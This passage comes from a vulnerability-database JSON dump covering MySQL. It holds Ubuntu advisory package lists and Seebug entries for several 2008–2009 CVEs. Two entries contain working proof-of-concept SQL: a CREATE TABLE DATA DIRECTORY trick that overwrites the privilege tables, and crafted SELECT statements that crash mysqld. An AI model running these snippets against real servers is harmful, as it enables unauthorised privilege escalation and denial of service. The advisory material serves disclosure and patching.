http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_all.deb Size/MD5: 57722 ff1439fc167590572fe8d655db49e1bc\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.1.30really5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 7690120 \\\r\n6da2ea09e8edf8a3d768a8e3d1ea15a9 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.3 \\\r\n0really5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 1879070 \\\r\n3fc7c0599b8324bd9fc22c5eefa3b976 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 8292706 0cbea113abd4393a8ef2d0231578ce7f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1. \\\r\n30really5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 24014628 \\\r\n767d67b701b7461e77fa1d1977d11e1b \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1 \\\r\n.30really5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 3535012 \\\r\n0dc0c7f6f230c30aeda03e99d578653b\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.1.30really5.0.75-0ubuntu10.3_i386.deb Size/MD5: 7299230 \\\r\nbaac628c664dfa1c699cc213a9c78fa6 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.3 \\\r\n0really5.0.75-0ubuntu10.3_i386.deb Size/MD5: 1843044 \\\r\n644c14b195edb5e34d8945ee407d2576 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_i386.deb Size/MD5: 7879312 5158664029e5253233b9140b39a2df80\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1. \\\r\n30really5.0.75-0ubuntu10.3_i386.deb Size/MD5: 23557588 \\\r\n90bd4333bd68fd47b530dca5dcc5eff4 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1 \\\r\n.30really5.0.75-0ubuntu10.3_i386.deb Size/MD5: 3349320 \\\r\nd18278f2c4ef544a885e115006327c1e\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.1.30real \\\r\nly5.0.75-0ubuntu10.3_lpia.deb Size/MD5: 7240220 fa79ae81847f46dcd5d5daefa8a6c0f3\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.30reall \\\r\ny5.0.75-0ubuntu10.3_lpia.deb Size/MD5: 1831892 1e2464fce24ca6ea84345ca0978f49e0\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_lpia.deb Size/MD5: 7882476 63d25719b32f8656462d1fd25a18819d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_lpia.deb Size/MD5: 23479958 5343688fc3ef1a7ac6b59a6bcffd45fd\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1.30rea \\\r\nlly5.0.75-0ubuntu10.3_lpia.deb Size/MD5: 3345432 14be7d779f4b5efabcbcddbb0d5a7acd\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.1.30real \\\r\nly5.0.75-0ubuntu10.3_powerpc.deb Size/MD5: 7692764 da0649e484302c6461ba8384121b91b2\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.30reall \\\r\ny5.0.75-0ubuntu10.3_powerpc.deb Size/MD5: 1883958 7f463f7d3b36f4681e3b808d737036d0\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_powerpc.deb Size/MD5: 8223568 7b96828c66e1120ffea61c84d2d2e838\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_powerpc.deb Size/MD5: 23969054 26a44c422051e7dd3f51bc85b59af8c6\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1.30rea \\\r\nlly5.0.75-0ubuntu10.3_powerpc.deb Size/MD5: 3491954 \\\r\n7363ef1740d5de28a3a2fc99f87ed8cb\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.1.30real \\\r\nly5.0.75-0ubuntu10.3_sparc.deb Size/MD5: 7222702 4a0634e6d9cf1d39bd89c2c5487b573d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.30reall \\\r\ny5.0.75-0ubuntu10.3_sparc.deb Size/MD5: 1850126 cab29baa81c69947373e3e4feb42feb4\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_sparc.deb Size/MD5: 7853078 557aa2180add88e17f4aeccca599af27\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_sparc.deb Size/MD5: 23770508 862006745adfc1d70475859390cad1b7\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1.30rea \\\r\nlly5.0.75-0ubuntu10.3_sparc.deb Size/MD5: 3303030 0c42d41169e9f68a151fefef5c98808b\r\n\r\nUpdated packages for Ubuntu 9.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37 \\\r\n-1ubuntu5.1.diff.gz Size/MD5: 324027 081acc52aeb607791ced32e325a75fd3\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37 \\\r\n-1ubuntu5.1.dsc Size/MD5: 1882 46dbf831cc6b4780f2cd83413b5661c7\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37 \\\r\n.orig.tar.gz Size/MD5: 17814352 a472b99a174592f052c37042764fea3e\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16-dev_ \\\r\n5.1.37-1ubuntu5.1_all.deb Size/MD5: 64104 2d47dd54cebd480163fff113ce7b5506\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client_5.1.37-1 \\\r\nubuntu5.1_all.deb Size/MD5: 64164 dd07b397c640f1687e10272ffc5a247a\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-common_5.1.37-1 \\\r\nubuntu5.1_all.deb Size/MD5: 69956 0ae3bdd2851865960eb9742ffeba8f11\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server_5.1.37-1 \\\r\nubuntu5.1_all.deb Size/MD5: 64288 376ed64c975947bb287391bb1bcbe932\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5. \\\r\n1.37-1ubuntu5.1_amd64.deb Size/MD5: 2401434 41b7e469f1566b873d524bafda60e75e\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1. \\\r\n37-1ubuntu5.1_amd64.deb Size/MD5: 1959230 70a0ccab9e29f6bb5ef029d73fe8c3d4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37- \\\r\n1ubuntu5.1_amd64.deb Size/MD5: 5664854 2e126e3a5d850d0361b25fc9e8808ef4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37- \\\r\n1ubuntu5.1_amd64.deb Size/MD5: 4435352 8e6e88801c466891a9e07743729b6e0c\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1. \\\r\n37-1ubuntu5.1_amd64.deb Size/MD5: 8833598 0200fbf6745b2d4df5fe4638f33e6b6d\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1. \\\r\n37-1ubuntu5.1_amd64.deb Size/MD5: 7271574 f0d1d182a70af5e07d952633a966b22f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1 \\\r\n_5.1.37-1ubuntu5.1_amd64.deb Size/MD5: 4125858 76802bd95972939cf2e21a2a317ca17e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5. \\\r\n1.37-1ubuntu5.1_i386.deb Size/MD5: 2331504 f0e7160d445f086438227ed6f7814c4e\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1. \\\r\n37-1ubuntu5.1_i386.deb Size/MD5: 1903424 d38f149b1c062dd900a379a34d4071a0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37- \\\r\n1ubuntu5.1_i386.deb Size/MD5: 5430754 545a105ae29b719b39fb27e3442e0775\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37- \\\r\n1ubuntu5.1_i386.deb Size/MD5: 4208940 52feb3c648a6466bd1fc5735f50dbb89\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1. \\\r\n37-1ubuntu5.1_i386.deb Size/MD5: 8202316 f10965dd8477b55363b4d9f82395fcd5\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1. \\\r\n37-1ubuntu5.1_i386.deb Size/MD5: 7186322 6aa11525e264e48f16c6b89ea6a738f7\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1 \\\r\n_5.1.37-1ubuntu5.1_i386.deb Size/MD5: 3838568 337f04d464f77fe992fa8e69489b9748\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubun \\\r\ntu5.1_lpia.deb Size/MD5: 2320962 06e64a478b4ede2470771fac26342064\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu \\\r\n5.1_lpia.deb Size/MD5: 1904468 1b01e357d6445da62ba0a8f888800269\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.1 \\\r\n_lpia.deb Size/MD5: 5396228 7bb5585662b0883cb817fd0c8169bb84\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.1 \\\r\n_lpia.deb Size/MD5: 4179966 c6ad5137f34df27156f09520980f2e6c\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu \\\r\n5.1_lpia.deb Size/MD5: 8189810 151ed5d123d9ac50558cbc6b83b6a6ee\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu \\\r\n5.1_lpia.deb Size/MD5: 7196610 3134ca1a858bc6d9a4d810b0b782d8e5\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1u \\\r\nbuntu5.1_lpia.deb Size/MD5: 3826714 9b7e7469d2744da817fde75fdf6d8917\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubun \\\r\ntu5.1_powerpc.deb Size/MD5: 2417938 6b29433aaa8e8cabd380e005d4cfea58\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu \\\r\n5.1_powerpc.deb Size/MD5: 1934354 6e8274c6d42fdfdcf61198c8741a24cc\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.1 \\\r\n_powerpc.deb Size/MD5: 5627838 1d098c34ad32fab1de5908685c9a6077\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.1 \\\r\n_powerpc.deb Size/MD5: 4361220 1f281f697381cfb468d11a369ebb16a4\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu \\\r\n5.1_powerpc.deb Size/MD5: 8685418 5a004af8a70a5575500db54da4c2b6fa\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu \\\r\n5.1_powerpc.deb Size/MD5: 7206674 05bcbe3dc75172bb7c03db4194210553\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1u \\\r\nbuntu5.1_powerpc.deb Size/MD5: 4061750 962d092c5c6774f0f043557101b07907\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubun \\\r\ntu5.1_sparc.deb Size/MD5: 2318038 4a05ff8676fb62d2877b880c60aceb04\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu \\\r\n5.1_sparc.deb Size/MD5: 1925036 8c70c11fe4610506214a83259301755d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.1 \\\r\n_sparc.deb Size/MD5: 5290706 eecd02ca6929a0119de8f28725a2d061\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.1 \\\r\n_sparc.deb Size/MD5: 4078654 a569a9994e214b5dfa65b98324da2b53\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu \\\r\n5.1_sparc.deb Size/MD5: 8328340 567bfd7dfd65df115d5cf617ea966633\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu \\\r\n5.1_sparc.deb Size/MD5: 7298590 8fed24d4d76cc540cd391d11ff23773e\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1u \\\r\nbuntu5.1_sparc.deb Size/MD5: 3876780 78bb59a165a1a1f8ee2c25f19436f7dc\r\n\r\n\n ", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19118"}, {"lastseen": "2017-11-19T18:27:52", "description": "CVE ID: CVE-2008-7247\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\n\u5f53\u6570\u636e\u4e3b\u76ee\u5f55\u5305\u542b\u6709\u5230\u4e0d\u540c\u6587\u4ef6\u7cfb\u7edf\u7684\u7b26\u53f7\u94fe\u63a5\u65f6\uff0cMySQL\u7684ql/sql_table.cc\u5141\u8bb8\u901a\u8fc7\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u4ee5\u7279\u6b8aDATA DIRECTORY\u6216INDEX DIRECTORY\u53c2\u6570\u8c03\u7528CREATE TABLE\u7ed5\u8fc7\u9884\u671f\u7684\u8bbf\u95ee\u9650\u5236\uff0c\u6267\u884c\u5404\u79cd\u975e\u6388\u6743\u64cd\u4f5c\u3002\n\nMySQL AB MySQL 6.0 \r\nMySQL AB MySQL 5.1.x \r\nMySQL AB MySQL 5.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://lists.mysql.com/commits/59711", "published": "2009-12-02T00:00:00", "type": "seebug", "title": "MySQL CREATE TABLE\u8c03\u7528\u7ed5\u8fc7\u8bbf\u95ee\u9650\u5236\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-7247"], "modified": "2009-12-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15004", "id": "SSV:15004", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:27:53", "description": "BUGTRAQ ID: 37075\r\nCVE ID: CVE-2009-4030\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\nMySQL\u5141\u8bb8\u672c\u5730\u7528\u6237\u901a\u8fc7\u5bf9MyISAM\u8868\u8c03\u7528CREATE TABLE\u7ed5\u8fc7\u67d0\u4e9b\u6743\u9650\u68c0\u67e5\u3002\u5728\u901a\u8fc7\u4ee5\u4e0b\u65b9\u5f0f\u521b\u5efaMyISAM\u8868\u65f6\uff1a\r\n\r\n CREATE TABLE ( ) DATA DIRECTORY ... INDEX DIRECTORY ...\r\n\r\n\u7531\u4e8e\u6ca1\u6709\u7279\u522b\u7684\u68c0\u67e5\u786e\u4fdd\u5df2\u6709\u7684\u8868\u683c\u4e0d\u4f1a\u88ab\u7b26\u53f7\u94fe\u63a5\u8986\u76d6\uff0c\u7528\u6237\u53ef\u4ee5\u5728test\u6570\u636e\u5e93\u4e2d\u521b\u5efauser\u8868\u683c\uff0cDATA DIRECTORY\u6307\u5411mysql\u6570\u636e\u5e93\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u4e0emysql_unpacked_real_data_home\u503c\u7684\u9519\u8bef\u8ba1\u7b97\u65b9\u5f0f\u6709\u5173\u3002\n\nMySQL AB MySQL 5.1.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://lists.mysql.com/commits/38278", "published": "2009-12-02T00:00:00", "type": "seebug", "title": "MySQL MyISAM\u8868\u7b26\u53f7\u94fe\u63a5\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4030"], "modified": "2009-12-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15007", "id": "SSV:15007", "sourceData": "\n root> grant all privileges on test.* to test@localhost;\r\n\r\ntest> create table t1 (a int) data directory '/MySQL/var/mysql', index directory\r\n'/MySQL/var/mysql';\r\n\r\nroot> flush tables;\r\nroot> create table t1 (a int);\r\nroot> insert t1 values (1),(2),(3);\r\nroot> flush tables;\r\n\r\ntest> select * from t1;\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15007", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:28:25", "description": "BUGTRAQ ID: 37076\r\nCVE ID: CVE-2009-4028\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\n\u5728\u4f7f\u7528OpenSSL\u7684\u65f6\u5019\uff0cMySQL\u7684viosslfactories.c\u6587\u4ef6\u4e2d\u7684vio_verify_callback\u51fd\u6570\u53ef\u4ee5\u63a5\u53d7\u6df1\u5ea6\u4e3a0\u7684X.509\u8bc1\u4e66\uff1a\r\n\r\nvio_verify_callback() at viosslfactories.c:\r\n\r\n /*\r\n Approve cert if depth is greater then "verify_depth", currently\r\n verify_depth is always 0 and there is no way to increase it.\r\n */\r\n if (verify_depth >= depth)\r\n ok= 1;\r\n\r\n\u63d0\u4f9b\u4e86\u7279\u5236\u8bc1\u4e66\u7684\u57fa\u4e8eSSL MySQL\u6570\u636e\u5e93\u53ef\u4ee5\u6267\u884c\u4e2d\u95f4\u4eba\u653b\u51fb\u3002\n\nMySQL AB MySQL 5.1.x \r\nMySQL AB MySQL 5.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://lists.mysql.com/commits/87446", "published": "2009-12-02T00:00:00", "type": "seebug", "title": "MySQL OpenSSL\u5ba2\u6237\u7aef\u7ed5\u8fc7yaSSL\u670d\u52a1\u5668\u8bc1\u4e66\u9a8c\u8bc1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4028"], "modified": "2009-12-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15006", "id": "SSV:15006", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:27:52", "description": "CVE ID: CVE-2009-4019\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\nMySQL\u7684mysqld\u5b88\u62a4\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u5730\u5904\u7406\u5728\u6267\u884c\u67d0\u4e9b\u5e26\u6709\u5b50\u67e5\u8be2\u7684SELECT\u8bed\u53e5\u671f\u95f4\u6240\u4ea7\u751f\u7684\u9519\u8bef\uff0c\u5728\u6267\u884c\u4f7f\u7528GeomFromWKB\u51fd\u6570\u7684\u8bed\u53e5\u671f\u95f4\u6ca1\u6709\u4fdd\u7559\u67d0\u4e9bnull_value\u6807\u8bb0\uff0c\u8fd9\u5141\u8bb8\u901a\u8fc7\u8ba4\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7\u63d0\u4ea4\u7279\u5236\u8bed\u53e5\u5bfc\u81f4\u5b88\u62a4\u7a0b\u5e8f\u5d29\u6e83\u3002\n\nMySQL AB MySQL 5.1.x \r\nMySQL AB MySQL 5.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://lists.mysql.com/commits/88409\r\nhttp://lists.mysql.com/commits/87482", "published": "2009-12-02T00:00:00", "type": "seebug", "title": "MySQL SELECT\u8bed\u53e5\u5904\u7406\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4019"], "modified": "2009-12-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15005", "id": "SSV:15005", "sourceData": "\n drop table if exists `t1`;\r\ncreate table `t1`(`a` float);\r\ninsert into `t1` values (-2),(-1);\r\nselect 1 from `t1`\r\nwhere\r\n`a` <> '1' and not\r\nrow(`a`,`a`) <=>\r\nrow((select 1 from `t1` where 1=2),(select 1 from `t1`)) \r\ninto @`var0`;\r\n\r\n\r\ndrop table if exists `t1`;\r\ncreate table `t1`(`c0` bigint,`c3` multipolygon);\r\ninsert into `t1` values \r\n(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));\r\nselect 1 from `t1` where \r\n`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15005", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:25:02", "description": "BUGTRAQ ID: 37297\r\nCVE ID: CVE-2009-4019\r\n\r\nMySQL\u662f\u4e00\u6b3e\u4f7f\u7528\u975e\u5e38\u5e7f\u6cdb\u7684\u5f00\u653e\u6e90\u4ee3\u7801\u5173\u7cfb\u6570\u636e\u5e93\u7cfb\u7edf\uff0c\u62e5\u6709\u5404\u79cd\u5e73\u53f0\u7684\u8fd0\u884c\u7248\u672c\u3002\r\n\r\nMySQL\u7684\u5728\u5904\u7406\u7279\u5b9a\u7684SQL\u64cd\u4f5c\u65f6\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u672c\u5730\u6216\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u5bfc\u81f4\u670d\u52a1\u5668\u5d29\u6e83\u3002\n\nMySQL AB MySQL 6.0.x\r\nMySQL AB MySQL 5.1.x \r\nMySQL AB MySQL 5.0.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMySQL AB\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mysql.com/", "published": "2009-12-17T00:00:00", "type": "seebug", "title": "MySQL\u591a\u4e2a\u7578\u5f62SQL\u64cd\u4f5c\u5904\u7406\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4019"], "modified": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15090", "id": "SSV:15090", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-7247", "CVE-2009-4019"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL 